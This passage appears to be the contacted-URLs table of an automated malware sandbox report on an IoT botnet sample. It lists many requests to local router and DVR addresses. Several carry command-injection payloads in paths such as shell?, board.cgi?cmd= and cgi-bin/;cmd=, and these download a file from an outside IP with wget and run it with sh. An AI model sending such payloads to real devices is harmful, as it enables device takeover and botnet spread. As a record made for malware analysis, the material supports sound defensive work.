                                            http://192.168.0.75/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                              		unknown
                                              http://172.67.198.22/ false
                                              • Avira URL Cloud: safe
                                              		 unknown
                                              http://192.168.0.156/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                		unknown
                                                http://192.168.0.75/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                                • Avira URL Cloud: safe
                                                		 unknown
                                                http://192.168.0.52/language/Swedish false
                                                • Avira URL Cloud: safe
                                                		 unknown
                                                http://192.168.0.156/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                  		unknown
                                                  http://192.168.0.44/language/Swedish false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://192.168.0.34/GponForm/diag_Form?images/ false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://192.168.0.13/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://192.168.0.53/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://195.208.1.100/ false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://192.168.0.33/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                    		unknown
                                                    http://185.12.92.157/ false
                                                    • Avira URL Cloud: safe
                                                    		 unknown
                                                    http://192.168.0.91/GponForm/diag_Form?images/ false
                                                    • Avira URL Cloud: safe
                                                    		 unknown
                                                    http://192.168.0.8/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                    • Avira URL Cloud: safe
                                                    		 unknown
                                                    http://37.230.114.67/ false
                                                    • Avira URL Cloud: safe
                                                    		 unknown
                                                    http://192.168.0.6/GponForm/diag_Form?images/ false
                                                    • Avira URL Cloud: safe
                                                    		 unknown
                                                    http://192.168.0.17/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                                    • Avira URL Cloud: safe
                                                    		 unknown
                                                    http://192.168.0.156/language/Swedish false
                                                    • Avira URL Cloud: safe
                                                    		 unknown
                                                    http://192.168.0.1/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                      		unknown
                                                      http://192.168.0.75/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                        		unknown
                                                        http://104.21.57.213/ false
                                                        • Avira URL Cloud: safe
                                                        		 unknown
                                                        http://172.67.167.8/ false
                                                        • Avira URL Cloud: safe
                                                        		 unknown
                                                        http://192.168.0.33/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                          		unknown
                                                          http://192.168.0.53/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                            		unknown
                                                            http://31.177.76.70/ false
                                                            • Avira URL Cloud: safe
                                                            		 unknown
                                                            http://192.168.0.41/GponForm/diag_Form?images/ false
                                                            • Avira URL Cloud: safe
                                                            		 unknown
                                                            http://192.168.0.41/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                            • Avira URL Cloud: safe
                                                            		 unknown
                                                            http://192.168.0.52/GponForm/diag_Form?images/ false
                                                            • Avira URL Cloud: safe
                                                            		 unknown
                                                            http://192.168.0.53/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                                            • Avira URL Cloud: safe
                                                            		 unknown
                                                            http://192.168.0.75/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                            • Avira URL Cloud: safe
                                                            		 unknown
                                                            http://194.58.112.174/ false
                                                            • Avira URL Cloud: safe
                                                            		 unknown
                                                            http://192.168.0.53/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                              		unknown
                                                              http://91.200.28.226/ false
                                                              • Avira URL Cloud: safe
                                                              		 unknown
                                                              http://192.168.0.1/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                		unknown
                                                                http://192.168.0.13/GponForm/diag_Form?images/ false
                                                                • Avira URL Cloud: safe
                                                                		 unknown
                                                                http://192.168.0.41/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                  		unknown
                                                                  http://192.168.0.1/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                    		unknown
                                                                    http://192.168.0.13/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                                                    • Avira URL Cloud: safe
                                                                    		 unknown
                                                                    http://87.236.16.208/ false
                                                                    • Avira URL Cloud: safe
                                                                    		 unknown
                                                                    http://192.168.0.2/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                                                    • Avira URL Cloud: safe
                                                                    		 unknown
                                                                    http://192.168.0.17/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                      		unknown
                                                                      http://192.168.0.156/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                                                      • Avira URL Cloud: safe
                                                                      		 unknown
                                                                      http://192.168.0.191/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                        		unknown
                                                                        http://192.168.0.83/language/Swedish false
                                                                        • Avira URL Cloud: safe
                                                                        		 unknown
                                                                        http://192.168.0.91/language/Swedish false
                                                                        • Avira URL Cloud: safe
                                                                        		 unknown
                                                                        http://192.168.0.156/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                          		unknown
                                                                          http://192.168.0.17/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                                          • Avira URL Cloud: safe
                                                                          		 unknown
                                                                          http://192.168.0.91/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                            		unknown
                                                                            http://90.156.201.123/ false
                                                                            • Avira URL Cloud: safe
                                                                            		 unknown
                                                                            http://192.168.0.2/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                              		unknown
                                                                              http://31.177.80.70/ false
                                                                              • Avira URL Cloud: safe
                                                                              		 unknown